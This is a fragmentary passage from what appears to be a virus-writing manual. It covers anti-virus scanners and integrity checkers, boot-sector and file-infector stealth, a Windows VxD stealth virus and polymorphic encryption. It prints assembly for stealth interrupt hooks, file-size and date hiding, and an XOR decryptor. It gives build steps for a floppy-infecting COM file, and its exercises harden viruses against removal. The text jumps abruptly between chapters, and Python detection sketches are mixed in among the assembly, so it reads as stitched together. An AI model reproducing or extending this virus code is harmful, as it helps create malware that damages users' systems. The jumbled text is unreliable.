with COM. Since a scanner’s strength is that it can find viruses
before they execute, it should search EXE files too. Any COM
file—including one with the MINI-44 in it—can be renamed to
EXE and planted on a disk. When it executes, it will only infect
COM files, but the original is an EXE.
Typically, a scanner will contain fields associated with each scan
string that tell it where to search for a particular string. This
selectivity cuts down on overhead and makes the scanner run faster.
Some scanners even have different modes that will search different
sets of files, depending on what you want. They might search
executables only, or all files, for example.
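One way to picture those per-string fields is a small record that carries the file types to search alongside the pattern. The sketch below is an assumption about how such a table might look, not the GBSCAN data structure; the ScanString record, the extension sets and the two mode names are all hypothetical.

```python
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class ScanString:
    name: str              # what to report when the pattern is found
    pattern: bytes         # the bytes to look for
    extensions: frozenset  # file types searched in "executables" mode


SCAN_STRINGS = [
    # MINI-44 infects COM files, but a renamed copy may sit in an EXE.
    ScanString("MINI-44",
               bytes.fromhex("B44EBA2601CD21721CB8013DBA9E00CD"),
               frozenset({".com", ".exe"})),
]


def strings_for(path: str, mode: str = "executables"):
    """Pick the scan strings that apply to one file in the given mode."""
    if mode == "all":
        return list(SCAN_STRINGS)
    suffix = Path(path).suffix.lower()
    return [s for s in SCAN_STRINGS if suffix in s.extensions]


def scan_bytes(path: str, data: bytes, mode: str = "executables"):
    """Return the names of all applicable scan strings found in data."""
    return [s.name for s in strings_for(path, mode) if s.pattern in data]
```

Restricting each string to the file types where it can matter is what saves time; the "all" mode trades that speed for coverage.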
This allows the scanner to search for boot sector and file infectors,
as well as resident viruses. Bit 5 of the flags indicates that you’re
at the end of the data structures which contain strings.
Our scanner, which we’ll call GBSCAN, must first scan memory
for resident viruses (SCAN_RAM). Next, it will scan the master
boot (SCAN_MASTER_BOOT) and operating system boot
(SCAN_BOOT) sectors, and finally it will scan all executable files
(SCAN_EXE and SCAN_COM).
Each routine simply loads whatever sector or file is to be
scanned into memory and calls SCAN_DATA with an address to
start the scan in es:bx and a data size to scan in cx, with the active
flags in al.
That’s all that’s needed to build a simple scanner. The profes-
sional anti-virus developer will notice that this scanner has a
number of shortcomings, most notably that it lacks a useful data-
base of scan strings. Building such a database is probably the
biggest job in maintaining a scanner. Of course, our purpose is not
to develop a commercial product, so we don’t need a big database
or a fast search engine. We just need the basic idea behind the
commercial product.
Behavior Checkers
The next major type of anti-virus product available today is
what I call a behavior checker. Behavior checkers watch your
computer for virus-like activity, and alert you when it takes place.
In this way, one can put together a program which will at least slow
down many common viruses. Such a program, GBCHECK, is
included on the Companion Disk.
Integrity Checkers
Typically, an integrity checker will build a log that contains the
names of all the files on a computer and some type of charac-
terization of those files. That characterization may consist of basic
data like the file size and date/time stamp, as well as a checksum,
CRC, or cryptographic checksum of some type. Each time the user
runs the integrity checker, it examines each file on the system and
compares it with the characterization it made earlier.
An integrity checker will catch most changes to files made on
your computer, including changes made by computer viruses. This
works because, if a virus adds itself to a program file, it will
probably make it bigger and change its checksum. Then, presum-
ably, the integrity checker will notice that something has changed,
and alert the user to this fact so he can take preventive action. Of
course, there could be thousands of viruses in your computer and
the integrity checker would never tell you as long as those viruses
didn’t execute and change some other file.
The integrity checker GBINTEG (on the Companion Disk) will
log the file size, date and checksum, and notify the user of any
changes.
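The log-and-compare cycle described above can be sketched in a few functions. This is not GBINTEG: the function names are hypothetical, and SHA-256 is swapped in as the cryptographic checksum because the checksum GBINTEG actually uses is not shown here.

```python
import hashlib
import os


def characterize(path: str) -> dict:
    """Record the size, modification time and checksum of one file."""
    info = os.stat(path)
    with open(path, "rb") as handle:
        digest = hashlib.sha256(handle.read()).hexdigest()
    return {"size": info.st_size, "mtime": int(info.st_mtime), "sha256": digest}


def build_log(root: str) -> dict:
    """Characterize every file under root, keyed by its path."""
    log = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            log[path] = characterize(path)
    return log


def compare_logs(old: dict, new: dict) -> dict:
    """Report which files changed, appeared or vanished between two logs."""
    return {
        "changed": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }
```

A first run would save the result of build_log; later runs build a fresh log and pass both to compare_logs. As noted above, a dormant file that never changes anything else produces no report.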
Overview
Over the years, scanners have remained the most popular way
to detect viruses. I believe this is because they require no special
knowledge of the computer and they can usually tell the user exactly
what is going on. Getting a message like “The XYZ virus has been
found in COMMAND.COM” conveys exact information to the
user. He knows where he stands. On the other hand, what should
Exercises
1. Put scan strings for all of the viruses discussed in Part I into GBSCAN.
Make sure you can detect both live boot sectors in the boot sector and
the dropper programs, which are COM or EXE programs. Use a separate
name for these two types. For example, if you detect a live Stoned, then
display the message “The STONED virus was found in the boot sector”
but if you detect a dropper, display the message “STONED.EXE is a
STONED virus dropper.”
2. The GBINTEG program does not verify the integrity of all executable
code on your computer. It only verifies COM and EXE files, as well as
the boot sectors. Modify GBINTEG to verify the integrity of SYS, DLL
and 386 files as well. Are there any other executable file names you
need to cover? (Hint: Rather than making GBINTEG real big by
hard-coding all these possibilities, break the search routine out into a
subroutine that can be passed the type of file to look for.)
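[Figure: flowchart of the Interrupt 13H read logic. Non-read functions go to the original INT 13H handler. Reads are tested for hard disk, Cyl 0 with Sec<VIR_SIZE+3 or Cyl 0, Sec 1, and whether the disk is infected (where cx = cx+VIR_SIZE+2 is applied), before the requested sectors are read with INT 40H.]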
(Note that I’ve left out some details so as not to obscure the basic
idea. If you want all the gory details, please refer to the IBM PC AT
Technical Reference.) All it does is check to make sure the drive is
ready for a command, then sends it a command to read the desired
sector, and proceeds to get the data from the drive when the drive
has it and is ready to send it to the CPU.
Similar direct-read routines could be written to access the
floppy disk, though the code looks completely different. Again, this
code is listed in the IBM PC AT Technical Reference.
This will slide you right past Interrupt 13H and any interrupt
13H-based stealthing mechanisms a virus might have installed.
Figure 24.2: IDE hard drive i/o ports.
Port Function
The int 40H instruction is simply 0CDH 40H, so all you have
to do to find the beginning of the interrupt 13H handler is to look
for CD 40 in the ROM BIOS segment 0F000H. Find it, go back a
few bytes, and you’re there. Call that and you get the original boot
sector or master boot sector, even if it is stealthed by an Interrupt
13H hook.
Maybe.
ready to transfer data. This flag is the Hard Disk Interrupt flag. It
resides at offset 84H in the BIOS data area at segment 40H. The
floppy disk uses the SEEK_STATUS flag at offset 3EH in the BIOS
data area. How is it that these flags get set and reset though?
When a hard or floppy disk finishes the work it has been
instructed to do by the BIOS or another program, it generates a
hardware interrupt. The routine which handles this hardware inter-
rupt sets the appropriate flag to notify the software which initiated
the read that the disk drive is now ready to send data. Simple
enough. The hard disk uses Interrupt 76H to perform this task, and
the floppy disk uses Interrupt 0EH. The software which initiated
the read will reset the flag after it has seen it.
But if you think about it, there’s no reason something couldn’t
intercept Interrupt 76H or 0EH as well and do something funny with
it, to fool anybody who was trying to work their way around
Interrupt 13H! Indeed, some viruses do exactly this.
One strategy might be to re-direct the read through the Interrupt
hook, so the anti-virus still gets the original boot sector. Another
strategy might simply be to frustrate the read if it doesn’t go through
the virus’ Interrupt 13H hook. That’s a lot easier, and fairly hard-
ware independent. Let’s explore this strategy a bit more . . . .
To hook the floppy hardware interrupt one writes an Interrupt
0EH hook which will check to see if the viral Interrupt 13H has
been called or not. If it’s been called, there is no problem, and the
Interrupt 0EH hook should simply pass control to the original
handler. If the viral Interrupt 13H hasn’t been called, though, then
something is trying to bypass it. In this case, the interrupt hook
should just reset the hardware and return to the caller without setting
the SEEK_STATUS flag. Doing that will cause the read attempt to
time out, because it appears the drive never came back and said it
was ready. This will generally cause whatever tried to read the disk
to fail—the equivalent of an int 13H which returned with c set. The
data will never get read in from the disk controller. An interrupt
hook of this form is very simple. It looks like this:
INT_0EH:
cmp BYTE PTR cs:[INSIDE],1 ;is INSIDE = 1 ?
jne INTERET ;no, ret to caller
jmp DWORD PTR cs:[OLD_0EH] ;go to old handler
INTERET:push ax
mov al,20H ;release intr ctrlr
out 20H,al
pop ax
iret ;and ret to caller
In addition to the int 0EH hook, the Interrupt 13H hook must be
modified to set the INSIDE flag when it is in operation. Typically,
the code to do that looks like this:
INT_13H:
mov BYTE PTR cs:[INSIDE],1 ;set the flag on entry
.
. ;do whatever
.
pushf ;call ROM BIOS
call DWORD PTR cs:[OLD_13H]
.
.
.
mov BYTE PTR cs:[INSIDE],0 ;reset flag on exit
retf 2 ;return to caller
The actual implementation of this code with the BBS virus is what
I’ll call Level Two stealth, and it is presented on the companion
disk.
If you want to test this level two stealth out, just write a little
program that reads the boot sector from the A: drive through
Interrupt 40H,
mov ax,201H
mov bx,200H
mov cx,1
mov dx,0
int 40H
You can run this under DEBUG both with the virus present and
without it, and you’ll see how the virus frustrates the read.
really getting at the true boot sector. Most anti-virus software isn’t
that smart, though.
If you’re thinking of buying an anti-virus site license for a large
number of computers, you should really investigate what it does to
circumvent boot-sector stealth like this. If it doesn’t do direct access
to the hardware, it is possible to use stealth against it. If it does do
direct hardware access, you have to test it very carefully for
compatibility with all your machines.
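When evaluating a product along these lines, the underlying test is a comparison of two views of the same sector: one read through Interrupt 13H and one read by direct hardware access. The sketch below assumes both 512-byte buffers have already been obtained by some other means, which is outside its scope; the function names are hypothetical.

```python
def differing_offsets(view_a: bytes, view_b: bytes):
    """List the byte offsets at which two reads of one sector disagree."""
    if len(view_a) != len(view_b):
        raise ValueError("both views must cover the same number of bytes")
    return [i for i, (a, b) in enumerate(zip(view_a, view_b)) if a != b]


def views_disagree(bios_view: bytes, direct_view: bytes) -> bool:
    """True if the two reads differ, which suggests something is
    interfering with one of the read paths."""
    return bool(differing_offsets(bios_view, direct_view))
```

If the two reads agree, nothing is proved, since both paths may have been intercepted. A disagreement, however, is a strong sign that something sits between the caller and the disk.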
Even direct hardware access can present some serious flaws as
soon as one moves to protected mode programming. That’s because
you can hook the i/o ports themselves in protected mode. Thus, a
direct hardware access can even be redirected! The SS-386 virus
does exactly this.1 However, the game works both ways. By hook-
ing i/o ports, an anti-virus can stop an ordinary virus that tries to
write a boot sector dead in its tracks. All of this becomes much
easier to do in the context of Windows, since it is a protected mode
operating system. We’ll discuss it in Chapter 26.
Memory “Stealth”
So far we’ve only discussed how a virus might hide itself on
disk: that is normally what is meant by “stealth”. A boot sector
virus may also hide itself in memory, though. So far, the resident
boot sector viruses we’ve discussed all go resident by changing the
size of system memory available to DOS which is stored in the
BIOS data area. While this technique is certainly a good way to do
things, it is also a dead give-away that there is a boot sector virus
in memory. To see it, all one has to do is run the CHKDSK program.
CHKDSK always reports the memory available to DOS, and you
can easily compare it with how much should be there. On a standard
640K system, you’ll get a display something like:
655,360 total bytes memory
485,648 bytes free
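The comparison a user makes by eye can also be automated. The sketch below assumes CHKDSK-style text in the format shown above and a standard 640K machine; the function names are hypothetical.

```python
import re

EXPECTED_BYTES = 640 * 1024  # 655,360 bytes on a standard 640K system


def total_memory_bytes(chkdsk_output: str) -> int:
    """Extract the 'total bytes memory' figure from CHKDSK-style text."""
    match = re.search(r"([\d,]+)\s+total bytes memory", chkdsk_output)
    if match is None:
        raise ValueError("no 'total bytes memory' line found")
    return int(match.group(1).replace(",", ""))


def missing_bytes(chkdsk_output: str, expected: int = EXPECTED_BYTES) -> int:
    """Return how many bytes are unaccounted for (0 if none are missing)."""
    return max(0, expected - total_memory_bytes(chkdsk_output))
```

A non-zero result does not by itself prove a virus is present, since other software can also reserve memory at the top of conventional RAM, but it is a reason to look further.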
Stealth Source
Three modules are provided to be used with the BBS virus to
implement Level One and Level Two stealth. They are
INT13HS1.ASM and INT13HS2.ASM/BOOTS2.ASM, respec-
tively. To use them, put the BBS virus source (in \BBS on the
Companion Disk) in a working directory, and copy either
INT13HS1.ASM or INT13HS2.ASM into this working directory
with the name INT13H.ASM. This replaces the original BBS
Interrupt 13H hook with the stealth hooks. For Level Two stealth,
you’ll also have to copy BOOTS2.ASM into BOOT.ASM in your
working directory. Then assemble as usual. Alternatively, working
copies of the stealth versions of BBS are also included on the
Companion Disk.
Exercises
1. The BBS stealthing read function does not stealth writes. This provides
an easy way to disinfect the virus. If you read the boot sector, it’s
stealthed, so you get the original. If you then turn around and write the
sector you just read, it isn’t stealthed, so it gets written over the viral
boot sector, effectively wiping the virus out. Add a WRITE_FUNC-
TION to the BBS’s Interrupt 13H hook to prevent this from happening.
You can stealth the writes, in which case anything written to the boot
sector will go where the original boot sector is stored. Alternatively,
you can simply write protect the viral boot sector and short circuit any
attempts to clean it up.
2. Round out the Level Two stealthing discussed here with (a) an Interrupt
13H, Function 0AH hook, (b) an Interrupt 76H hook and (c) an Interrupt
40H hook. When writing the Interrupt 76H hook, be aware that the hard
disk uses the second interrupt controller chip. To reset it you must out
a 20H to port A0H.
3. Modify the original BBS virus so that it moves itself in memory when
DOS loads so that it becomes more like a conventional DOS TSR. To
do this, create a new M-type memory block at the base of the existing
Z block, exactly the same size as the memory stolen from the system
by the virus before DOS loaded. Move the Z block up, and adjust the
memory size at 0:413H to get rid of the high memory where the virus
was originally resident. Finally, move the virus down into its new
M-block. What conditions should be present before the virus does all
Just like boot sector viruses, viruses which infect files can also
use a variety of tricks to hide the fact that they are present from
prying programs. In this chapter, we’ll examine the Slips virus,
which employs a number of stealth techniques that are essential for
a good stealth virus.
Slips is a fairly straightforward memory resident EXE infector
as far as its reproduction method goes. It works by infecting files
during the directory search process. It uses the usual DOS Interrupt
21H Function 31H to go resident, and then it EXECs the host to
make it run. Its stealthing makes infected files appear to be uninfected
on disk. Because it is extremely infective (i.e., capable of
infecting an entire computer in a few minutes), it has been designed
to operate under DOS 6.22 or earlier, but not in the DOS supplied
with Windows 95.
Self-Identification
Since Slips must determine whether a file is infected or not in
a variety of situations and then take action to hide the infection, it
needs a quick and 100% certain way to recognize an infection.
Typically, stealth file infectors employ a simple technique to
identify themselves, like changing the file date 100 years into the
future. If properly stealthed, the virus will be the only thing that
sees the unusual date. Any other program examining the date will
see a correct value, because the virus will adjust it before letting
anything else see it. This is the technique Slips uses: any file
infected by Slips will have the date set 57 years into the future. That
means it will be at least 2037, so the virus should work without
fouling up until that date.
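The arithmetic behind the 57-year marker follows from the layout of the 16-bit DOS date word: bits 0-4 hold the day, bits 5-8 the month, and bits 9-15 the number of years since 1980. Adding 57*512 therefore changes only the year field. The following is a minimal sketch in Python, written from the point of view of a checking program that wants to decode a date word and flag an implausible year. The helper names are illustrative assumptions and do not come from Slips.

```python
DATE_ADDER = 57 * 512  # 57 placed in the year field (bits 9-15)

def unpack_dos_date(word):
    """Split a 16-bit DOS date word into (year, month, day)."""
    day = word & 0x1F
    month = (word >> 5) & 0x0F
    year = 1980 + (word >> 9)
    return year, month, day

def pack_dos_date(year, month, day):
    """Build a 16-bit DOS date word from a calendar date."""
    return ((year - 1980) << 9) | (month << 5) | day

def looks_marked(word):
    """True if the date word is 2037 or later, i.e. at least 57 years past 1980."""
    return word >= DATE_ADDER
```

Note that a file genuinely dated 2037 or later would be flagged as well, which is exactly the limit described above.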
Let’s discuss each of these functions, and how the virus must handle
them.
in any data returned by the file search functions. In this way, any
search function will only see the original file size and date, even
though that’s not what’s really on disk.
Both types of search functions use the DTA to store the data
they retrieve. For handle-based functions, the size is stored at
DTA+26H and the date is at DTA+24H. For FCB-based searches,
the size is at FCB+29H and the date is at FCB+25H. Typical code
to adjust these is given by
HSEARCH:
call DOS ;call original search
cmp [DTA+24H],57*512 ;date > 2037?
jc EXIT ;no, just exit
sub [DTA+24H],57*512 ;yes, subtract 57 yrs
sub [DTA+26H],VSIZE ;adjust size
sbb [DTA+28H],0 ;including high word
EXIT:
to the next SFT block to look there. The next SFT block’s address
is stored at offset 0 in the block.
Of course, to do this, you must know the entry number you are
looking for. You can find that in the PSP of the process calling DOS,
starting at offset 18H. When DOS opens a file and creates a file
handle for a process, it keeps a table of them at this offset in the
PSP. The file handle is an index into this table. Thus, for example,
mov al,es:[bx+18H]
will put the SFT entry number into al, if es is the PSP, and bx
contains the handle.
Once the virus has found the correct SFT entry, it can pick up
the file’s date stamp and determine whether it is infected or not. If
so, it can also determine the length of the file, and the current file
pointer. Using that and the amount of data requested in the cx
register when called, the virus can determine whether stealthing is
necessary or not. If the read requests data at the end of the file where
the virus is hiding, the virus can defeat the read, or simply truncate
it so that only the host is read.
If the read requests data at the beginning of the file, where the
header was modified, Slips breaks it down into two reads. First,
Slips reads the requested data, complete with the modified header.
Then, Slips skips to the end of the file where the data EXE_HDR is
stored in the virus. This contains a copy of the unmodified header.
Slips then reads this unmodified header in over the actual header,
making it once again appear uninfected. Finally, Slips adjusts the
file pointer so that it’s exactly where it should have been if only the
first read had occurred. All of this is accomplished by the
HREAD_HOOK function.
The true file length is then returned in dx:ax. To this number it adds
the distance from the end of the file it was asked to move, thereby
calculating the requested distance from the beginning of the file.
From this number it subtracts OFFSET END_VIRUS + 10H,
which is where the move would go if the virus wasn’t there.
Each SFT entry has the following structure (DOS 4.0 to 6.22):

Offset  Size  Description
0       2     No. of file handles referring to this file
2       2     File open mode (From Fctn 3DH al)
4       1     File attribute
5       2     Device info word, if device, includes drive #
7       4     Pointer to device driver header or Drive Parameter Block
0BH     2     Starting cluster of file
0DH     2     File time stamp
0FH     2     File date stamp
11H     4     File size
15H     4     File pointer where read/write will go in file
19H     2     Relative cluster in file of last cluster accessed
1BH     2     Absolute cluster of last cluster accessed
1DH     2     Number of sector containing directory entry
1FH     1     Number of dir entry within sector
20H     11    File name in FCB format
2BH     4     Pointer to previous SFT sharing same file
2FH     2     Network machine number which opened file
31H     2     PSP segment of file’s owner
33H     2     Offset within SHARE.EXE of sharing record
any DOS interrupt hooks. Such a hook could simply return with
carry set unless it was called from within the DOS Interrupt 21H
hook. To do that one would just have to set a flag every time
Interrupt 21H was entered, and then check it before processing any
Interrupt 13H request. A typical handler would look like this:
INT_13H:
cmp cs:[IN_21H],1 ;in int 21H?
jne EXIT_BAD ;no, don’t let it go
jmp DWORD PTR cs:[OLD_13H] ;else ok, go to old
EXIT_BAD:
xor ax,ax ;destroy ax
stc ;return with c set
retf 2
you may recall, the Yellow Worm had to pad the end of the original
EXE so that the virus started on a paragraph boundary. That is
necessary so that the virus always begins executing at offset 0.
Unfortunately this technique makes the number of bytes added to
a file a variable. Thus, the virus cannot simply subtract X bytes from
the true size to get the uninfected size. To fix that, Slips must make
an additional adjustment to the file size. It adds enough bytes at the
end of the file so that the number added at the start plus the end is
always equal to 16. Then it can simply subtract its own size plus 16
to get the original size of the file.
Anti-Virus Measures
Since file stealth is so complex, most anti-virus programs are
quite satisfied to simply scan memory for known viruses, and then
tell you to shut down and boot from a clean floppy disk if they find
one. This is an absolutely stupid approach, and you should shun any
anti-virus product that does only this to protect against stealthing
viruses.
The typical methods used by more sophisticated anti-virus
software against stealth file infectors are to either tunnel past their
interrupt hooks or to find something the virus neglected to stealth
in order to get at the original handler.
It is not too hard to tunnel Interrupt 21H to find the original
vector because DOS is so standardized. There are normally only a
very few versions which are being run at any given point in history.
Thus, one could even reasonably scan for it.
Secondly, if the virus forgets to hook every function which, for
example, reports the file size, then the ones it hooked will report
one size, and those it missed will report a different size. For
example, one could look at the file size by:
1) Doing a handle-based file search, and extracting the size from the
search record.
2) Doing an FCB-based file search, and extracting the size from the
search record.
3) Opening the file and seeking the end with Function 4202H,
getting the file size in dx:ax.
4) Using DOS function 23H to get the file size.
5) Opening the file and getting the size from the file’s SFT entry.
If you don’t get the same answer every time, you can be sure
something real funny is going on! (As the old bit of wisdom goes,
it’s easy for two people to tell the truth, but if they’re going to lie,
it’s hard for them to keep their story straight.) Even if you can’t
identify the virus, you might surmise that something’s there.
Any scanner or integrity checker that doesn’t watch out for
these kinds of things is the work of amateurs.
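The cross-checking idea can be sketched for a checking program as follows. This is only a modern analogue in Python, assuming an ordinary operating system rather than the five DOS calls listed above: it asks for the size of one file by four independent routes and reports whether the answers agree. The function names are illustrative.

```python
import os

def reported_sizes(path):
    """Ask for the size of one file by several independent routes."""
    sizes = {"stat": os.stat(path).st_size}
    with open(path, "rb") as f:
        sizes["fstat"] = os.fstat(f.fileno()).st_size
        sizes["seek_end"] = f.seek(0, os.SEEK_END)  # seek returns the new offset
        f.seek(0)
        sizes["read_all"] = len(f.read())
    return sizes

def sizes_disagree(sizes):
    """True if the routes did not all report the same size."""
    return len(set(sizes.values())) > 1
```

If sizes_disagree returns True for a file that nothing else is writing to, something is sitting between the checker and the disk, even if the checker cannot say what.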
then the virus could get control passed to it right out of DOS. The
virus could do its thing, then replace the code at JLOC with what
was originally there and return control there. Such a scheme is
practically impossible to thwart in a generic way, without detailed
knowledge of a specific virus.
Well, by now I hope you can see why a lot of anti-virus
packages just scan memory and freeze if they find a resident virus.
However, I hope you can also see why that’s such a dumb strategy:
it provides no generic protection. You have to wait for your anti-
virus developer to get the virus before you can defend against it.
And any generic protection is better than none.
Stealth for DOS File Infectors 303
Exercises
1. Implement an Interrupt 21H Function 23H hook in Slips to report the
uninfected file size back to the caller when this function is queried.
3. Can you figure out a way to maintain the SFTs so that the data in them
for all open files will appear uninfected?
4. Implement an Interrupt 21H, Function 3EH (Close File) hook that will
at least partially make up for the self-disinfecting capability of Slips. If
an infection routine is called when a file is closed, it can be re-infected
even though it just got disinfected, say by a “copy FILEA.EXE
FILEB.EXE” instruction.
5. What adder should you use for the date in order to make a virus like
Slips functional for the maximum length of time?
660 bytes. To make the binary VVD.386 into something that can
be assembled into a virus, one runs the COMPRESS program (on
the disk with this book) on it to create a compressed binary,
VVD.333. Then one runs the DB program to turn the compressed
program into an ascii array of bytes defined with assembler db
statements. This file, VDD.INC, is included in WinBoot by way of
an INCLUDE statement in WINBOOT.ASM.
When Interrupt 2FH, ax = 1605H is received by the virus, it
calls a DECOMPRESS routine that decompresses the compressed
VVD into the virus’ internal disk buffer, and writes it to disk, where
Windows can access it.
Loading VVD.386
Once VVD.386 exists on the hard disk, Windows must be
instructed to load it. The Interrupt 2FH, Function 1605H was
designed to make this possible. To tell Windows to load the device,
the interrupt 2FH handler must pass Windows a data structure
called the Win Startup Info structure on return. This has the follow-
ing format:
SIS_Version DB 3,0
SIS_Next_Dev DW ?,? ;es:bx from old handler
SIS_Vir_Dev DW OFFSET VVD_ID,0 ;ptr to VVD name
SIS_Ref_Data DD 0 ;used for instanceable data
SIS_Inst_Ptr DD 0
The last two fields are irrelevant to what we are doing and they
should be set to zero. The first field is the version number of the
type of the device.
The second field, SIS_Next_Dev_Ptr is designed to work with
the chaining concept involved in Interrupt 2FH. There may be
several programs in memory which are interested in interrupt 2FH,
function 1605H. Thus, there may be several Startup Info structures
for Windows to interpret. Each Interrupt 2FH handler which wants
Windows to do something special at startup will pass such a
structure, with its address in es:bx. If es:bx was non-zero when this
particular handler received control, there is another data structure
to access. Thus, es:bx should be stored in SIS_Next_Dev_Ptr and
es:bx should be set to point to this structure on exit from the handler.
Windows Stealth Techniques 309
hooked that interrupt. If there aren’t any more hooks, it will reflect
the interrupt back to the virtual machine to handle the processing
itself.
Winboot’s VVD handles stealthing the hard disk and the floppy
disk in two different ways, to demonstrate two possible ways of
using a virtual device driver to stealth a virus. When the hook
HD_HANDLER gets called, it first checks to see if it is being
requested to access the hard disk or a floppy. In the event of a hard
disk access, it examines the registers passed to Interrupt 13H to see
if an attempt to read the master boot record, or another viral sector,
is being made. If so, the cl register being passed to Interrupt 13H is
modified to change the sector number being read. Then the carry
flag is set to reflect the interrupt back to the virtual machine for
processing. The interrupt handler in the virtual machine then reads
the wrong sector and gives it back to the application program that
made the interrupt 13H. In this way, for example, an attempt to read
the master boot record returns not the viral master boot record, but
the original master boot record, effectively stealthing the infection.
The code to stealth the hard drive looks like this:
BeginProc HD_HANDLER
cmp [ebp.Client_AH],2 ;read or write?
je SHORT CHECK_HD
cmp [ebp.Client_AH],3
jne SHORT REFLECT_HD ;no, ignore it
CHECK_HD:
test [ebp.Client_DL],80H ;floppy disk?
jz SHORT HANDLE_FLOPPY ;yes, go handle it
cmp [ebp.Client_DL],80H ;Hard drive C:?
jne SHORT REFLECT_HD ;no, don’t stealth
cmp [ebp.Client_DH],0 ;ok, c:, so stealth
jne SHORT REFLECT_HD
cmp [ebp.Client_CX],VIRUS_SECTORS+1 ;cylinder 0?
jg SHORT REFLECT_HD
add [ebp.Client_CL],VIRUS_SECTORS+1 ;redirect the rd/wrt
jmp SHORT REFLECT_HD
REFLECT_HD: ;reflect to next VxD or to V86
stc
ret
Note that the registers being passed to the Interrupt 13H handler
in the virtual machine are stored in the Client data structure on the
ring 0 protected mode stack. Thus, to modify the cl register in the
virtual machine, the virtual device driver modifies ebp.Client_CL.
The General Protection Fault handler takes care of setting up the
Next, the VVD sets the interrupt vector in the virtual machine
to point to the virus code:
mov eax,13H ;set Int 13H to go through virus
mov cx,9820H
mov edx,7204H
VMMCall Set_V86_Int_Vector
When the virus code terminates with an iret or a retf 2, the VVD
again gains control, terminating the critical section and restoring
the virtual machine’s interrupt 13H vector to its original value:
BeginProc HD_RETURN
VMMCall End_Critical_Section
mov eax,13H
mov cx,WORD PTR [OLD_13H+4]
mov edx,[OLD_13H]
VMMCall Set_V86_Int_Vector
ret
Building WinBoot
To build WinBoot, one must first assemble and link VVD.386.
A makefile to do this is included on the Companion Disk with this
book. However, in order to assemble and link it, you’ll need the
special version of MASM and LINK which are provided with the
Windows Device Driver Kit on the Developer’s Network CDs.
Note that although the device driver kits can be obtained with the
Developer’s Network for no additional charge, you must ask for
them when you pay for the Developer’s Network or you won’t get
them.
Once you have built VVD.386, you must run COMPRESS and
DB on it to create VDD.INC. Put this in the same directory as
WINBOOT.ASM, and assemble that with TASM or MASM and
then link it to a COM file. The COM file will infect a floppy diskette
in drive A: when executed.
Exercises
The following exercises will help you explore Virtual Device
Drivers a bit more in the context of viruses. You’ll need the Device
Development Kit and the Developer’s Library from Microsoft to
do these exercises.
1. If you attempt to read the Master Boot Record with the VVD installed,
you’ll notice that the return registers from your INT 13H will not be the
same as what they were going in. That’s because VVD changed them.
Modify VVD to hook the return from INT 13H, and restore the original
values of the registers (except ax) so that you don’t notice any fishy
business if you examine the registers.
one might modify the virus to instead execute this operation with
the code
mov dx,2513H
mov ax,1307H
xchg ax,dx
int 21H
The scanner would no longer see it, and the virus could go on its
merry way without being detected.
Take this idea one step further, though: Suppose that a virus
was programmed so that it had no constant string of code available
Well, with all of that said, let me say it one more time, just so
you understand completely: The virus we discuss in this chapter
was developed in January, 1993. It has been published and made
available on CD-ROM as well as in the first edition of The Giant
Black Book for any anti-virus developer who wants to bother with
it since that time. The anti-virus software I am testing it against was
current, effective January, 1998—five years later. The results are
in some cases abysmal. I hope some anti-virus developers will read
this and take it to heart.
The Idea
Basically, a polymorphic virus can be broken down into two
parts. The main body of the virus is generally encrypted using a
variable encryption routine which changes with each copy of the
virus. As such, the main body always looks different. Next, in front
of this encrypted part is placed a decryptor. The decryptor is
responsible for decrypting the body of the virus and passing control
to it. This decryptor must be generated by the polymorphic engine
in a somewhat random fashion too. If a fixed decryptor were used,
then an anti-virus could simply take a string of code from it, and
the job would be done. By generating the decryptor randomly each
time, the virus can change it enough that it cannot be detected either.
Rather than simply appending an image of itself to a program
file, a polymorphic virus takes the extra step of building a special
encrypted image of itself in memory, and that is appended to a file.
Encryption Technology
The first hoop a polymorphic virus must jump through is to
encrypt the main body of the virus. This “main body” is what we
normally think of as the virus: the search routine, the infection
routine, any stealth routines, etc. It also consists of the code which
makes the virus polymorphic to begin with, i.e., the routines which
perform the encryption and the routines which generate the decryp-
tor.
Now understand that when I say “encryption” and “decryption”
I mean something far different than what cryptographers
think of. The art of cryptography involves enciphering a message
so that one cannot analyze the ciphered message to determine what
the original message was, if one does not have a secret password,
etc. A polymorphic virus does not work like that. For one, there is
no “secret password.” Secondly, the decryption process must be
completely trivial. That is, the program’s decryptor, by itself, must
be able to decrypt the main body of the virus and execute it. It must
not require any external input from the operator, like a crypto-
graphic program would. A lot of well-known virus researchers
seem to miss this.
A simple automatic encryption/decryption routine might take
the form
DECRYPT:
mov si,OFFSET START
mov di,OFFSET START
mov cx,VIR_SIZE
ELP: lodsb
xor al,093H
stosb
loop ELP
START:
(Body of virus goes here)
This decryptor simply XORs every byte of the code, from START to
START+VIR_SIZE, with a constant value, 93H. Both the encryptor
and the decryptor can be identical in this instance.
The problem with a very simple decryptor like this is that it
only has 256 different possibilities for encrypting a virus, one for
each constant value used in the xor instruction. A scanner can thus
detect it without a tremendous amount of work. For example, suppose
the unencrypted code looked like this:
10H 20H 27H 10H 60H
Rather than looking for these bytes directly, the scanner could
look for the xor of bytes 1 and 2, bytes 1 and 3, etc. These would
be given by
30H 37H 00H 70H
Because the same constant is XORed into every byte, it cancels out
of these differences, so they are identical in every encrypted copy.
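The scanner's side of this can be sketched in a few lines. The Python below is a minimal illustration, not the method of any particular anti-virus product, and the function names are assumptions. It computes the XOR of the first byte with each later byte and searches a buffer for a window with the same differences, which works for all 256 possible constants.

```python
def xor_signature(data):
    """XOR of the first byte with each later byte.

    A one-byte XOR key applied to every byte cancels out of these values.
    """
    first = data[0]
    return bytes(first ^ b for b in data[1:])

def find_xor_invariant(haystack, plain_pattern):
    """Return the offset of the first window matching the pattern's
    XOR signature, or -1 if there is none."""
    sig = xor_signature(plain_pattern)
    n = len(plain_pattern)
    for i in range(len(haystack) - n + 1):
        if xor_signature(haystack[i:i + n]) == sig:
            return i
    return -1
```

With the five bytes from the example above, xor_signature yields 30H 37H 00H 70H, and the search succeeds regardless of the constant used to encrypt them.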
Polymorphic Viruses 321
Self-Detection
In most of the viruses we’ve discussed up to this point, a form
of scanning has been used to determine whether or not the virus is
present. Ideally, a polymorphic virus can’t be scanned for, so one
cannot design one which detects itself with scanning. Typically,
polymorphic viruses detect themselves using tricky little aspects of
the file. We’ve already encountered this with the Military Police
virus, which required the file’s day plus time to be 31.
Decryptor Coding
